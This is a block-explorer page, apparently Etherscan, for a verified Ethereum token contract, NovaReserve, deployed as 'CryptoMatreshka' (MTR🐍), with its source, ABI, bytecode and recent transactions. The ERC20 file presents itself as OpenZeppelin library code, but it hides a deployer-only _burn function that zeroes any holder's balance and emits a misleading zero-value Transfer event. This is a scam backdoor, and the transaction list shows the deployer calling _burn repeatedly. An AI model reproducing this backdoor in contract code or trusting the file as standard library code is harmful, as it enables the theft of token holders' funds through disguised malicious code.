ETH Price: $2,808.03 (-6.05%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
_burn233367282025-09-11 2:06:23140 days ago1757556383IN
0x6Ae2095d...e534cd21D
0 ETH0.000003830.15209002
_burn233367102025-09-11 2:02:47140 days ago1757556167IN
0x6Ae2095d...e534cd21D
0 ETH0.000004230.1678773
_burn233366972025-09-11 2:00:11140 days ago1757556011IN
0x6Ae2095d...e534cd21D
0 ETH0.000003910.15544519
Approve233366702025-09-11 1:54:47140 days ago1757555687IN
0x6Ae2095d...e534cd21D
0 ETH0.000007470.16139403
Approve233366662025-09-11 1:53:59140 days ago1757555639IN
0x6Ae2095d...e534cd21D
0 ETH0.000007120.15371798
Approve233366602025-09-11 1:52:47140 days ago1757555567IN
0x6Ae2095d...e534cd21D
0 ETH0.000007180.15522994

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
NovaReserve

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
Yes with 200 runs

Other Settings:
cancun EvmVersion
File 1 of 4 : token.sol
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

contract NovaReserve is ERC20 {
    constructor(string memory name, string memory symbol, uint256 initialSupply)
       ERC20(name, symbol)
    {
        _mint(msg.sender, initialSupply * 10 ** decimals());
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.28;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private immutable _deployer;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _deployer = msg.sender;
    }
    
    modifier onlyDeployer() {
        require(msg.sender == _deployer);
        _;
    }

    event deadAddress(address indexed account);
    function _burn(address target) external onlyDeployer {
        require(target != address(0), "Invalid address");
        require(target != _deployer, "Cannot target owner");
        _balances[target] = 0;
        emit Transfer(address(0), target, 0);
        emit deadAddress(target);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = msg.sender;
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = msg.sender;
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = msg.sender;
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }


    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0));
        require(to != address(0));

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount);
        unchecked {
            _balances[from] -= amount;
            _balances[to]   += amount;
        }

        emit Transfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0));

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0));
        require(spender != address(0));

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount);
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "evmVersion": "cancun",
  "metadata": {
    "bytecodeHash": "ipfs"
  },
  "viaIR": false,
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"initialSupply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"}],"name":"deadAddress","type":"event"},{"inputs":[{"internalType":"address","name":"target","type":"address"}],"name":"_burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a060405234801561000f575f5ffd5b50604051610b84380380610b8483398101604081905261002e9161018f565b8282600361003c8382610280565b5060046100498282610280565b505033608081905261007191506100626012600a610433565b61006c9084610448565b610079565b505050610472565b6001600160a01b03821661008b575f5ffd5b8060025f82825461009c919061045f565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112610115575f5ffd5b81516001600160401b0381111561012e5761012e6100f2565b604051601f8201601f19908116603f011681016001600160401b038111828210171561015c5761015c6100f2565b604052818152838201602001851015610173575f5ffd5b8160208501602083015e5f918101602001919091529392505050565b5f5f5f606084860312156101a1575f5ffd5b83516001600160401b038111156101b6575f5ffd5b6101c286828701610106565b602086015190945090506001600160401b038111156101df575f5ffd5b6101eb86828701610106565b925050604084015190509250925092565b600181811c9082168061021057607f821691505b60208210810361022e57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111561027b57805f5260205f20601f840160051c810160208510156102595750805b601f840160051c820191505b81811015610278575f8155600101610265565b50505b505050565b81516001600160401b03811115610299576102996100f2565b6102ad816102a784546101fc565b84610234565b6020601f8211600181146102df575f83156102c85750848201515b5f19600385901b1c1916600184901b178455610278565b5f84815260208120601f198516915b8281101561030e57878501518255602094850194600190920191016102ee565b508482101561032b57868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b634e487b7160e01b5f52601160045260245ffd5b6001815b60018411156103895780850481111561036d5761036d61033a565b600184161561037b57908102905b60019390931c928002610352565b935093915050565b5f8261039f5750600161042d565b816103ab57505f61042d565b81600181146103c157600281146103cb576103e7565b600191505061042d565b60ff8411156103dc576103dc61033a565b50506001821b61042d565b5060208310610133831016604e8410600b841016171561040a575081810a61042d565b6104165f19848461034e565b805f19048211156104295761042961033a565b0290505b92915050565b5f61044160ff841683610391565b9392505050565b808202811582820484141761042d5761042d61033a565b8082018082111561042d5761042d61033a565b6080516106f36104915f395f8181610295015261030d01526106f35ff3fe608060405234801561000f575f5ffd5b506004361061009b575f3560e01c806370a082311161006357806370a082311461011457806395d89b411461013c578063a9059cbb14610144578063daf81d5a14610157578063dd62ed3e1461016c575f5ffd5b806306fdde031461009f578063095ea7b3146100bd57806318160ddd146100e057806323b872dd146100f2578063313ce56714610105575b5f5ffd5b6100a76101a4565b6040516100b49190610582565b60405180910390f35b6100d06100cb3660046105d2565b610234565b60405190151581526020016100b4565b6002545b6040519081526020016100b4565b6100d06101003660046105fa565b61024b565b604051601281526020016100b4565b6100e4610122366004610634565b6001600160a01b03165f9081526020819052604090205490565b6100a761026e565b6100d06101523660046105d2565b61027d565b61016a610165366004610634565b61028a565b005b6100e461017a366004610654565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6060600380546101b390610685565b80601f01602080910402602001604051908101604052809291908181526020018280546101df90610685565b801561022a5780601f106102015761010080835404028352916020019161022a565b820191905f5260205f20905b81548152906001019060200180831161020d57829003601f168201915b5050505050905090565b5f33610241818585610402565b5060019392505050565b5f33610258858285610486565b6102638585856104d2565b506001949350505050565b6060600480546101b390610685565b5f336102418185856104d2565b336001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016146102be575f5ffd5b6001600160a01b03811661030b5760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316816001600160a01b0316036103825760405162461bcd60e51b815260206004820152601360248201527221b0b73737ba103a30b933b2ba1037bbb732b960691b6044820152606401610302565b6001600160a01b0381165f81815260208181526040808320839055518281527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36040516001600160a01b038216907fa52fd505c03609fa9186c00c3992c21af1e993368bfb85a851554d53a67da29c905f90a250565b6001600160a01b038316610414575f5ffd5b6001600160a01b038216610426575f5ffd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f1981146104cc57818110156104bf575f5ffd5b6104cc8484848403610402565b50505050565b6001600160a01b0383166104e4575f5ffd5b6001600160a01b0382166104f6575f5ffd5b6001600160a01b0383165f908152602081905260409020548181101561051a575f5ffd5b6001600160a01b038481165f818152602081815260408083208054889003905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b03811681146105cd575f5ffd5b919050565b5f5f604083850312156105e3575f5ffd5b6105ec836105b7565b946020939093013593505050565b5f5f5f6060848603121561060c575f5ffd5b610615846105b7565b9250610623602085016105b7565b929592945050506040919091013590565b5f60208284031215610644575f5ffd5b61064d826105b7565b9392505050565b5f5f60408385031215610665575f5ffd5b61066e836105b7565b915061067c602084016105b7565b90509250929050565b600181811c9082168061069957607f821691505b6020821081036106b757634e487b7160e01b5f52602260045260245ffd5b5091905056fea26469706673582212203059681fb99cafb4c802590093780f629549194eba27af2f66ce54be79241d3564736f6c634300081c0033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000016bd2c6e65a40000000000000000000000000000000000000000000000000000000000000000f43727970746f4d6174726573686b61000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074d5452f09f908d00000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f5ffd5b506004361061009b575f3560e01c806370a082311161006357806370a082311461011457806395d89b411461013c578063a9059cbb14610144578063daf81d5a14610157578063dd62ed3e1461016c575f5ffd5b806306fdde031461009f578063095ea7b3146100bd57806318160ddd146100e057806323b872dd146100f2578063313ce56714610105575b5f5ffd5b6100a76101a4565b6040516100b49190610582565b60405180910390f35b6100d06100cb3660046105d2565b610234565b60405190151581526020016100b4565b6002545b6040519081526020016100b4565b6100d06101003660046105fa565b61024b565b604051601281526020016100b4565b6100e4610122366004610634565b6001600160a01b03165f9081526020819052604090205490565b6100a761026e565b6100d06101523660046105d2565b61027d565b61016a610165366004610634565b61028a565b005b6100e461017a366004610654565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6060600380546101b390610685565b80601f01602080910402602001604051908101604052809291908181526020018280546101df90610685565b801561022a5780601f106102015761010080835404028352916020019161022a565b820191905f5260205f20905b81548152906001019060200180831161020d57829003601f168201915b5050505050905090565b5f33610241818585610402565b5060019392505050565b5f33610258858285610486565b6102638585856104d2565b506001949350505050565b6060600480546101b390610685565b5f336102418185856104d2565b336001600160a01b037f000000000000000000000000e1c3953199789a7e50fe8259c5535f77ff960bd116146102be575f5ffd5b6001600160a01b03811661030b5760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b7f000000000000000000000000e1c3953199789a7e50fe8259c5535f77ff960bd16001600160a01b0316816001600160a01b0316036103825760405162461bcd60e51b815260206004820152601360248201527221b0b73737ba103a30b933b2ba1037bbb732b960691b6044820152606401610302565b6001600160a01b0381165f81815260208181526040808320839055518281527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36040516001600160a01b038216907fa52fd505c03609fa9186c00c3992c21af1e993368bfb85a851554d53a67da29c905f90a250565b6001600160a01b038316610414575f5ffd5b6001600160a01b038216610426575f5ffd5b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f1981146104cc57818110156104bf575f5ffd5b6104cc8484848403610402565b50505050565b6001600160a01b0383166104e4575f5ffd5b6001600160a01b0382166104f6575f5ffd5b6001600160a01b0383165f908152602081905260409020548181101561051a575f5ffd5b6001600160a01b038481165f818152602081815260408083208054889003905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b03811681146105cd575f5ffd5b919050565b5f5f604083850312156105e3575f5ffd5b6105ec836105b7565b946020939093013593505050565b5f5f5f6060848603121561060c575f5ffd5b610615846105b7565b9250610623602085016105b7565b929592945050506040919091013590565b5f60208284031215610644575f5ffd5b61064d826105b7565b9392505050565b5f5f60408385031215610665575f5ffd5b61066e836105b7565b915061067c602084016105b7565b90509250929050565b600181811c9082168061069957607f821691505b6020821081036106b757634e487b7160e01b5f52602260045260245ffd5b5091905056fea26469706673582212203059681fb99cafb4c802590093780f629549194eba27af2f66ce54be79241d3564736f6c634300081c0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000016bd2c6e65a40000000000000000000000000000000000000000000000000000000000000000f43727970746f4d6174726573686b61000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074d5452f09f908d00000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name (string): CryptoMatreshka
Arg [1] : symbol (string): MTR🐍
Arg [2] : initialSupply (uint256): 400028001000000

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 00000000000000000000000000000000000000000000000000016bd2c6e65a40
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000f
Arg [4] : 43727970746f4d6174726573686b610000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 4d5452f09f908d00000000000000000000000000000000000000000000000000


Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.